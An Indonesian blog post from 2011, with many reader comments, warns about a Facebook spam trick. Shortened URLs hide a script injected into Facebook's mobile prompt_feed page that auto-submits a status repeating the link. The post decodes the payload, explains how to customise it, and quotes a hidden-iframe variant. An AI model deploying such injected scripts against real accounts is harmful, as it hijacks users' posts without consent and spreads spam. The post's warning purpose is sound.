[Hacking]Bahaya Url pendek FB


Barusan saya melihat status orang yang hampir sama. Awalnya saya kira ini memanfaatkan aplikasi facebook. Setelah dikopi paste dengan wget diterminal. Beginilah hasilnya :
http://tinyurl.com/sampahh berubah menjadi :
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’%3Cscript%3Ewindow.onload=function(){document.forms[0].message.value=’jangan%20salahin%20w%20kalo%20lo%20bakal%20ngakak%20ngeliat%20ni%20orang%20:D%20http://tinyurl.com/sampahh’;document.forms[0].submit();}%3C/script%3E
Huh …tinyurl-nya berfungsi untuk menyembunyikan javascriptnya 😦
kalau kita decode jadilah seperti ini

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang :D http://tinyurl.com/sampahh';document.forms[0].submit();}</script>

Dasar orang isenk 😦 Bukan virus, tapi ya mengubah satus kita sesuai denan message value di atas.

Update : ini juga

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='ini fotoku wkt lg ML http://tinyurl.com/rahasiapribadiku';document.forms[0].submit();}</script>

untuk membuat ini cukup mudah
cukup kopi link diatas kemudian ganti bagian message.value.
contoh :
ini testing dari mamakey http://tinyurl.com/mamakey
maka tertulis :

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload%3Dfunction(){document.forms[0].message.value%3D’ini testing dari mamakey %3AD http%3A%2F%2Ftinyurl.com%2Fmamakey’%3Bdocument.forms[0].submit()%3B}<%2Fscript>’
Silahkan saja klik link diatas 😀 dan hapus pada wall anda

update lagi :

sekarang mereka tidak memakai tinyURL tapi memakai IFRAME untuk melakukan scripting.. huh jahat. Ketemu scriptnya disini :

<iframe id="CrazyDaVinci" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&amp;user_message_prompt=%27%3Cscript%3Ewindow.onload=function%28%29%7Bdocument.forms%5B0%5D.message.value=%27Masih ada orang yg mau terkenal dan kaya raya dengan memuja setan, termasuk salah satu grup band terkenal di Indonesia ckckckck.... baca selengkapnya di http://tinyurl.com/4fqudco %21%21%21%27;document.forms%5B0%5D.submit%28%29;%7D%3C/script%3E" style="display: none;"></iframe>
terima kasih Fuad for pointing me 🙂

  1. Thanks ya Mbak, mohon ijin info ke yg lain…

  2. itulah tehnologi , kalau jatuh ketangan yang salah, atau orang yang gak bertanggung jawab beginilah jadinya…..tinggal kitanya aja yang perlu ati ati sekarang, jangan gampang tergoda dengan hal hal yg menarik,,,salam kenal.

  3. Thanks infonya ya. Mohon ijin aku share di fb ya

  4. aku masih pemula mbak, tp gak apa biar nambah2 wwsn aj,
    thank’s to all.

  5. thanks mbak sangat berguna infonya, sudah tak delete smua di profilku

  6. info yg menarik………………………….

    • ca ab
    • Maret 29th, 2011

    sama barusan aku juga kejebak tepaksa ganti pass trus hapus tu spam

    • ca ab
    • Maret 29th, 2011

    sama barusan aku juga kena jebak

  7. pengetahuan baru nih buat saya. Makasih! 🙂

  8. ahai, mau tanya it berakibt fatal buat fb+email tdk ya, mhn pencerahan nya.

    • danny nomaden
    • Maret 29th, 2011

    thanks ilmunya … ta pikir ulah iseng sapa neee

    • zyfa
    • Maret 29th, 2011

    wkwkkwkwk….. aku cuga kejebak…. pengalaman.com

    • Ferry
    • Maret 29th, 2011

    wah penjelasan dari seorang yang ahli nih,, sampe capture lewat unix ya.. ^___^
    Nice info Gan…

  9. mbak makasih infonya…saya juga liat temen saya kaya begeto,,,,mohon ijin share…makasih

  10. wah, makasih mbak, ternyata itu toh, he6

  11. besok kita kampanye pake model kayak gini. 😀

    • Coco Devil
    • Maret 29th, 2011

    Nice info, sangat bermanfaat gan…

  12. emmh.
    makasih sist infonya.
    salam.

  13. makasih.. makasih … infonya.. 🙂

    • Dychana
    • Maret 29th, 2011

    saya adalah orang yang nggak gampang trjebak… coz udah ke enduz dahulu… thanks sharenya… 😆

  14. Ada tipe baru bu pake javascript, http://lupuszone.webs.com/samsons.html. sepertinya harus segera memberitahu facebook akan kelemahan di sistus merek.

    Kalau lihat di bagian head ada kode berikut

  15. block saja app ini~

    • rykubayu
    • Maret 29th, 2011
  16. Bugs FB? heuheu
    bu kalau pake Iframe hasilnya beda kah?

  17. Bug facebook ada disini promt-feed.php itu yg dijadikan tempat msuk cracker :hehe

    • siroj100
    • Maret 29th, 2011

    parah banget yah lobang security di fb nih….

  18. untung saya udah jarang pake Facebook…. hehehe.. 🙂

      • ilyasafsoh.com
      • Maret 30th, 2011

      mantap kak

  19. Sepertinya twitter juga kena masalah serupa belakangan ini…

  20. tapi klo pakai cara itu, penyebarannya cuma sekali, tidak dapat berkali-kali

  21. hm pantes aku agak aneh liatnya
    makasih
    https://roena.wordpress.com/2011/03/30/ciuman-terakhir/

    • awam
    • Maret 30th, 2011

    letak/dampak bahayanya apa ya? masih gak ngerti… mohon bantuannya… thx

    • OmoRose
    • Maret 30th, 2011

    wah makasih yah infonya… pantesan kemaren di beranda banyak stat2 kek gini…

  22. Thanx a lot informasinya.. saya sempat kawatir karena saya juga kena.. terus terang saya kurang mengerti maksud script diatas, tapi saya cukup berterima kasih karena telah diberitahu inti maksud sebernarnya

  23. +1

  24. memang harus hati2 dengan teknik2 black hat yg terbaru

    • ganangprakoso
    • Maret 30th, 2011

    ijin share di fb saya ya mbak

    • Dychana
    • Maret 30th, 2011

    blog saya ini di hack orang… ada yg tau solusinya…????

      • Sayid Mualim
      • Maret 30th, 2011

      Minta saja email dan paswordnya gan 😀

  25. hmm makin banyak yg make dong script menjebak ini… ada baiknya scriptnya tidak usah ditampilkan cukup deskripsinya saja…

  26. mohon ijin utk copy paste.. salam.

  27. ooow, jadi begitu toh triknya…
    harus lebih hati2 buka shortened url

  28. Efek nya apa cuma status itu juga muncul sebagai status kita gan, ada kemungkinan pencurian password fb kita ngggak?

  29. wuih, banyak juga tuh yang make scrip tih, ijin share untuk info kawan laen

  30. Emmm…ada2 aja tp boleh lah…. iseng lewat script2 nakal…

    • rh15c
    • Maret 31st, 2011

    code of evil….and plenty more…:)

    • fujay
    • Maret 31st, 2011

    Bagaimana antisipasinya? apa ngak boleh buka FB di Seluler? ato harus ganti password? maaf sy baru nih…
    trims

  31. alhamdulillah dapat penjelasan dari mas, jadi bisa membantu teman-teman yang menjadi korban,..

  32. nice share sist, kalau ane ketemu FB chat yang URL nya aneh2 langsung ane click CLOSE. Nggak ane buka2 lagi…

    • Loe Gue End
    • November 4th, 2011

    kalau pakai IFRAME, jadinya seperti apa?

  33. informasinya sangat membantu, semoga dengan info ini teman-teman yang lain bisa terhindar dari kerugian karena metode tersebut.

  1. Maret 30th, 2011
    Trackback from : Top Posts — WordPress.com

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s